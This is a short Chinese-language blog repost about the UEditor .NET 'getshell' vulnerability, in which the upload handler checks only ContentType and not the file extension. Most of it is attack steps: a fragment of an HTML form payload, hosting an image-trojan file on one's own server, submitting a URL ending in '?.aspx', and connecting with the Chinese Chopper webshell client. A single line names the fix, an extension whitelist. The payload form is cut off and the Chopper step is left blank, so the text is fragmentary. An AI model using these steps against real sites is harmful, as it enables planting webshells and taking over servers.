當前位置：首頁 > 编程语言 > php >内容正文

php

ue编辑器php漏洞:ueditor getshell

發(fā)布時間：2023/12/20 php 26 豆豆

生活随笔收集整理的這篇文章主要介紹了 ue编辑器php漏洞:ueditor getshell 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

8月21日，網(wǎng)上爆出ueditor .net版本getshell漏洞，由于只校驗ContentType而沒校驗文件后綴導(dǎo)致getshell。

Payload：

<p>shell addr:<input type=”text” name=”source[]” /></p >

</form>

圖片馬x.jpg放在自己服務(wù)器上

提交http://www.domain.top/x.jpg?.aspx

菜刀連接：

增加文件擴展名校驗（白名單）

以上是生活随笔為你收集整理的ue编辑器php漏洞:ueditor getshell的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。